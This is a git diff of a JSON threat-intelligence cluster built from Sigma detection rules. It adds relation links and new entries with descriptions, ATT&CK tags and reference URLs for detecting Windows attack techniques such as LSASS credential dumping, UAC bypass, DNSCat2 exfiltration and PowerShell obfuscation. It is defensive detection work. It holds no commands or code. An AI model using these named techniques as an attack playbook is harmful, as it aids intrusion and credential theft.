"logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md#atomic-test-7---create-a-process-using-wmi-query-and-an-encoded-command", - "https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware", + "https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_unc2452_ps.yml" ], "tags": [ @@ -40941,6 +52450,22 @@ "attack.t1047" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b7155193-8a81-4d8f-805d-88de864ca50c", "value": "UNC2452 PowerShell Pattern" }, @@ -40967,6 +52492,22 @@ "attack.t1562.002" ] }, + "related": [ + { + "dest-uuid": "3d333250-30e4-4a82-9edc-756c68afc529", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "4eb28bed-d11a-4641-9863-c2ac017d910a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4d7cda18-1b12-4e52-b45c-d28653210df8", "value": "Sysmon Driver Unload" }, @@ -41015,6 +52556,15 @@ "attack.execution" ] }, + "related": [ + { + "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "8f88e3f6-2a49-48f5-a5c4-2f7eedf78710", "value": "Java Running with Remote Debugging" }, @@ -41056,8 +52606,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://app.any.run/tasks/93fe92fa-8b2b-4d92-8c09-a841aed2e793/", "https://docs.microsoft.com/en-us/windows/compatibility/ntvdm-and-16-bit-app-support", + "https://app.any.run/tasks/93fe92fa-8b2b-4d92-8c09-a841aed2e793/", "https://support.microsoft.com/fr-fr/topic/an-ms-dos-based-program-that-uses-the-ms-dos-protected-mode-interface-crashes-on-a-computer-that-is-running-windows-7-5dc739ea-987b-b458-15e4-d28d5cca63c7", "https://app.any.run/tasks/214094a7-0abc-4a7b-a564-1b757faed79d/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_16bit_application.yml" @@ -41088,9 +52638,53 @@ "attack.t1218.011" ] }, + "related": [ + { + "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7453575c-a747-40b9-839b-125a0aae324b", "value": "Unidentified Attacker November 2018" }, + { + "description": "Detects suspicious encoded character syntax often used for defense evasion", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/07/09", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_powershell_obfuscation_via_utf8.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/0gtweet/status/1281103918693482496", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_obfuscation_via_utf8.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027" + ] + }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "e312efd0-35a1-407f-8439-b8d434b438a6", + "value": "Potential PowerShell Obfuscation Via WCHAR" + }, { "description": "Detects when a possible suspicious driver is being installed via pnputil.exe lolbin", "meta": { @@ -41106,8 +52700,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://strontic.github.io/xcyclopedia/library/pnputil.exe-60EDC5E6BDBAEE441F2E3AEACD0340D2.html", "https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/pnputil-command-syntax", + "https://strontic.github.io/xcyclopedia/library/pnputil.exe-60EDC5E6BDBAEE441F2E3AEACD0340D2.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml" ], "tags": [ @@ -41139,6 +52733,15 @@ "attack.t1219" ] }, + "related": [ + { + "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "145322e4-0fd3-486b-81ca-9addc75736d8", "value": "Use of UltraVNC Remote Access Software" }, @@ -41164,6 +52767,15 @@ "attack.t1053.005" ] }, + "related": [ + { + "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ff2fff64-4cd6-4a2b-ba7d-e28a30bbe66b", "value": "Suspicious Scheduled Task Name As GUID" }, @@ -41189,6 +52801,15 @@ "attack.t1021.006" ] }, + "related": [ + { + "dest-uuid": "60d0c01d-e2bf-49dd-a453-f8a9c9fa6f65", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a197e378-d31b-41c0-9635-cfdf1c1bb423", "value": "WinRM Access with Evil-WinRM" }, @@ -41214,9 +52835,42 @@ "attack.t1053.005" ] }, + "related": [ + { + "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e1118a8f-82f5-44b3-bb6b-8a284e5df602", "value": "Scheduled Task WScript VBScript" }, + { + "description": "Detects suspicious children of application launched from inside the WindowsApps directory. This could be a sign of a rogue \".appx\" package installation/execution", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2023/01/12", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_appx_execution.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/", + "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_appx_execution.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "f91ed517-a6ba-471d-9910-b3b4a398c0f3", + "value": "Suspicious Windows App Activity" + }, { "description": "Detects Wscript or Cscript executing from a drive other than C. This has been observed with Qakbot executing from within a mounted ISO file.", "meta": { @@ -41239,6 +52893,15 @@ "attack.t1059" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "5b80cf53-3a46-4adc-960b-05ec19348d74", "value": "Wscript Execution from Non C Drive" }, @@ -41263,6 +52926,15 @@ "attack.t1027.004" ] }, + "related": [ + { + "dest-uuid": "c726e0a2-a57a-4b7b-a973-d0f013246617", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7b10f171-7f04-47c7-9fa2-5be43c76e535", "value": "Visual Basic Command Line Compiler Usage" }, @@ -41324,9 +52996,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1562.001/T1562.001.md", "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md", + "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_reg_add.yml" ], "tags": [ @@ -41351,8 +53023,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/Yasser_Elsnbary/status/1553804135354564608", "https://h.43z.one/ipconverter/", + "https://twitter.com/Yasser_Elsnbary/status/1553804135354564608", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_obfuscated_ip_via_cli.yml" ], "tags": [ @@ -41385,6 +53057,15 @@ "attack.initial_access" ] }, + "related": [ + { + "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "24de4f3b-804c-4165-b442-5a06a2302c7e", "value": "Arbitrary Shell Command Execution Via Settingcontent-Ms" }, @@ -41401,8 +53082,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.echotrail.io/insights/search/regsvr32.exe", "https://redcanary.com/blog/intelligence-insights-april-2022/", + "https://www.echotrail.io/insights/search/regsvr32.exe", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regsvr32_spawn_explorer.yml" ], "tags": [ @@ -41410,6 +53091,15 @@ "attack.t1218.010" ] }, + "related": [ + { + "dest-uuid": "b97f1d35-4249-4486-a6b5-ee60ccf24fab", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6f0947a4-1c5e-4e0d-8ac7-53159b8f23ca", "value": "Regsvr32 Spawning Explorer" }, @@ -41426,8 +53116,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://threathunterplaybook.com/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.html", "https://github.com/OTRF/detection-hackathon-apt29/issues/6", + "https://threathunterplaybook.com/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_high_integrity_sdclt.yml" ], "tags": [ @@ -41436,6 +53126,15 @@ "attack.t1548.002" ] }, + "related": [ + { + "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "40f9af16-589d-4984-b78d-8c2aec023197", "value": "High Integrity Sdclt Process" }, @@ -41452,8 +53151,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://blu3-team.blogspot.com/2019/08/powershell-dns-c2-notes.html", "https://ragged-lab.blogspot.com/2020/06/it-is-always-dns-powershell-edition.html", + "https://blu3-team.blogspot.com/2019/08/powershell-dns-c2-notes.html", "https://github.com/lukebaggett/dnscat2-powershell", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dnscat2_powershell_implementation.yml" ], @@ -41465,6 +53164,36 @@ "attack.t1041" ] }, + "related": [ + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "1996eef1-ced3-4d7f-bf94-33298cabbf72", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "c325b232-d5bc-4dde-a3ec-71f3db9e8adc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "92d7da27-2d91-488e-a00c-059dc162766d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b11d75d6-d7c1-11ea-87d0-0242ac130003", "value": "DNSCat2 Powershell Implementation Detection Via Process Creation" }, @@ -41490,6 +53219,22 @@ "attack.t1059.007" ] }, + "related": [ + { + "dest-uuid": "ff25900d-76d5-449b-a351-8824e62fc81b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "df1f26d3-bea7-4700-9ea2-ad3e990cf90e", "value": "Node Process Executions" }, @@ -41507,8 +53252,8 @@ "logsource.product": "windows", "refs": [ "https://www.hybrid-analysis.com/sample/4be06ecd234e2110bd615649fe4a6fa95403979acf889d7e45a78985eb50acf9?environmentId=1", - "https://digital-forensics.sans.org/blog/2010/06/04/wmic-draft/", "https://blog.malwarebytes.com/threat-analysis/2016/04/rokku-ransomware/", + "https://digital-forensics.sans.org/blog/2010/06/04/wmic-draft/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wmic_execution.yml" ], "tags": [ @@ -41517,6 +53262,15 @@ "car.2016-03-002" ] }, + "related": [ + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "526be59f-a573-4eea-b5f7-f0973207634d", "value": "Suspicious WMIC Execution" }, @@ -41542,6 +53296,15 @@ "attack.t1053.005" ] }, + "related": [ + { + "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1c0e41cd-21bb-4433-9acc-4a2cd6367b9b", "value": "Suspicious Modification Of Scheduled Tasks" }, @@ -41568,33 +53331,18 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b3512211-c67e-4707-bedc-66efc7848863", "value": "Potential PowerShell Downgrade Attack" }, - { - "description": "This rule detects DLL injection and execution via LOLBAS - Tracker.exe", - "meta": { - "author": "Avneet Singh @v3t0_, oscd.community", - "creation_date": "2020/10/18", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_tracker_execution.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Tracker/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_tracker_execution.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1055.001" - ] - }, - "uuid": "148431ce-4b70-403d-8525-fcc2993f29ea", - "value": "DLL Injection with Tracker.exe" - }, { "description": "Detects suspicious process patterns found in logs when CrackMapExec is used", "meta": { @@ -41616,6 +53364,15 @@ "attack.t1003.001" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f26307d8-14cd-47e3-a26b-4b4769f24af6", "value": "CrackMapExec Process Patterns" }, @@ -41643,6 +53400,15 @@ "attack.t1036.003" ] }, + "related": [ + { + "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "fff9d2b7-e11c-4a69-93d3-40ef66189767", "value": "Suspicious Copy From or To System32" }, @@ -41669,6 +53435,22 @@ "attack.persistence" ] }, + "related": [ + { + "dest-uuid": "fe926152-f431-4baf-956c-4ad3cb0bf23b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ae9b0bd7-8888-4606-b444-0ed7410cb728", "value": "Writing Of Malicious Files To The Fonts Folder" }, @@ -41695,6 +53477,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ac20ae82-8758-4f38-958e-b44a3140ca88", "value": "Invoke-Obfuscation Via Use MSHTA" }, @@ -41719,9 +53510,51 @@ "attack.t1219" ] }, + "related": [ + { + "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d85873ef-a0f8-4c48-a53a-6b621f11729d", "value": "Use of LogMeIn Remote Access Software" }, + { + "description": "Detects powershell scripts that import modules from suspicious directories", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2023/01/10", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_import_module_susp_dirs.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_import_module_susp_dirs.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "c31364f7-8be6-4b77-8483-dd2b5a7b69a3", + "value": "Import PowerShell Modules From Suspicious Directories - ProcCreation" + }, { "description": "An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities", "meta": { @@ -41743,6 +53576,15 @@ "attack.t1560.001" ] }, + "related": [ + { + "dest-uuid": "00f90846-cbd1-4fc5-9233-df5c2bf2a662", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e2e80da2-8c66-4e00-ae3c-2eebd29f6b6d", "value": "Compress Data and Lock With Password for Exfiltration With WINZIP" }, @@ -41768,6 +53610,15 @@ "attack.t1564.001" ] }, + "related": [ + { + "dest-uuid": "ec8fc7e2-b356-455c-8db5-2e37be158e7d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "bb19e94c-59ae-4c15-8c12-c563d23fe52b", "value": "Set Windows System File with Attrib" }, @@ -41798,6 +53649,15 @@ "attack.t1135" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c601f20d-570a-4cde-a7d6-e17f99cb8e7f", "value": "Turla Group Lateral Movement" }, @@ -41822,6 +53682,15 @@ "attack.t1564.004" ] }, + "related": [ + { + "dest-uuid": "f2857333-11d4-45bf-b064-2c28d8525be5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4b13db67-0c45-40f1-aba8-66a1a7198a1e", "value": "Suspicious Extrac32 Alternate Data Stream Execution" }, @@ -41848,6 +53717,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a20391f8-76fb-437b-abc0-dba2df1952c6", "value": "NodejsTools PressAnyKey Lolbin" }, @@ -41872,6 +53750,15 @@ "attack.t1105" ] }, + "related": [ + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "eee00933-a761-4cd0-be70-c42fe91731e7", "value": "GfxDownloadWrapper.exe Downloads File from Suspicious URL" }, @@ -41913,10 +53800,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://www.rapid7.com/blog/post/2022/01/18/active-exploitation-of-vmware-horizon-servers/", + "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", "https://www.sprocketsecurity.com/resources/crossing-the-log4j-horizon-a-vulnerability-with-no-return", "https://nodejs.org/api/cli.html", - "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", - "https://www.rapid7.com/blog/post/2022/01/18/active-exploitation-of-vmware-horizon-servers/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_node_abuse.yml" ], "tags": [ @@ -41924,6 +53811,15 @@ "attack.t1127" ] }, + "related": [ + { + "dest-uuid": "ff25900d-76d5-449b-a351-8824e62fc81b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6640f31c-01ad-49b5-beb5-83498a5cd8bd", "value": "Node.exe Process Abuse" }, @@ -41949,6 +53845,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ac175779-025a-4f12-98b0-acdaeb77ea85", "value": "PowerShell Script Run in AppData" }, @@ -41965,9 +53870,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://mattharr0ey.medium.com/privilege-escalation-uac-bypass-in-changepk-c40b92818d1b", "https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf", "https://github.com/hfiref0x/UACME", - "https://mattharr0ey.medium.com/privilege-escalation-uac-bypass-in-changepk-c40b92818d1b", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_changepk_slui.yml" ], "tags": [ @@ -41976,6 +53881,15 @@ "attack.t1548.002" ] }, + "related": [ + { + "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "503d581c-7df0-4bbe-b9be-5840c0ecc1fc", "value": "UAC Bypass Using ChangePK and SLUI" }, @@ -41992,8 +53906,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.google.com/url?hl=en&q=https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about&source=gmail&ust=1511481120837000&usg=AFQjCNGdL7gVwLXaNSl2Td8ylDYbSJFmPw", "https://www.hybrid-analysis.com/sample/2a4ae284c76f868fc51d3bb65da8caa6efacb707f265b25c30f34250b76b7507?environmentId=100", + "https://www.google.com/url?hl=en&q=https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about&source=gmail&ust=1511481120837000&usg=AFQjCNGdL7gVwLXaNSl2Td8ylDYbSJFmPw", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2017_11882.yml" ], "tags": [ @@ -42004,6 +53918,22 @@ "attack.t1566.001" ] }, + "related": [ + { + "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "678eb5f4-8597-4be6-8be7-905e4234b53a", "value": "Droppers Exploiting CVE-2017-11882" }, @@ -42029,6 +53959,15 @@ "attack.t1059" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c0b2768a-dd06-4671-8339-b16ca8d1f27f", "value": "Fsutil Behavior Set SymlinkEvaluation" }, @@ -42053,6 +53992,15 @@ "attack.t1552.006" ] }, + "related": [ + { + "dest-uuid": "8d7bd4f5-3a89-4453-9c82-2c8894d5655e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "fe63010f-8823-4864-a96b-a7b4a0f7b929", "value": "Findstr LSASS" }, @@ -42092,8 +54040,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.1", "https://adsecurity.org/?p=2604", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.1", "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7.1", "https://thedfirreport.com/2021/11/01/from-zero-to-domain-admin/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_set_policies_to_unsecure_level.yml" @@ -42103,6 +54051,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180", "value": "Change PowerShell Policies to an Insecure Level" }, @@ -42119,9 +54076,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/0gtweet/status/1602644163824156672?s=20&t=kuxbUnZPltpvFPZdCrqPXA", "https://twitter.com/pabraeken/status/990717080805789697", "https://lolbas-project.github.io/lolbas/Binaries/Runonce/", + "https://twitter.com/0gtweet/status/1602644163824156672?s=20&t=kuxbUnZPltpvFPZdCrqPXA", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_runonce_execution.yml" ], "tags": [ @@ -42155,6 +54112,15 @@ "attack.t1090" ] }, + "related": [ + { + "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "782d6f3e-4c5d-4b8c-92a3-1d05fed72e63", "value": "Netsh RDP Port Forwarding" }, @@ -42203,6 +54169,15 @@ "attack.t1090.003" ] }, + "related": [ + { + "dest-uuid": "a782ebe2-daba-42c7-bc82-e8e9d923162d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c", "value": "Tor Client or Tor Browser Use" }, @@ -42219,12 +54194,12 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/shantanukhande/status/1229348874298388484", + "https://twitter.com/Wietze/status/1542107456507203586", "https://twitter.com/pythonresponder/status/1385064506049630211?s=21", "https://twitter.com/Hexacorn/status/1224848930795552769", - "https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/", "https://twitter.com/SBousseaden/status/1167417096374050817", - "https://twitter.com/Wietze/status/1542107456507203586", + "https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/", + "https://twitter.com/shantanukhande/status/1229348874298388484", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_process_dump_rundll32_comsvcs.yml" ], "tags": [ @@ -42235,6 +54210,15 @@ "car.2013-05-009" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "646ea171-dded-4578-8a4d-65e9822892e3", "value": "Process Dump via Rundll32 and Comsvcs.dll" }, @@ -42251,16 +54235,16 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables", + "https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code", + "https://bunnyinside.com/?term=f71e8cb9c76a", + "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39", + "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_", + "https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38", "http://managed670.rssing.com/chan-5590147/all_p1.html", "https://twitter.com/_xpn_/status/1268712093928378368", - "https://bunnyinside.com/?term=f71e8cb9c76a", - "https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code", "https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr", - 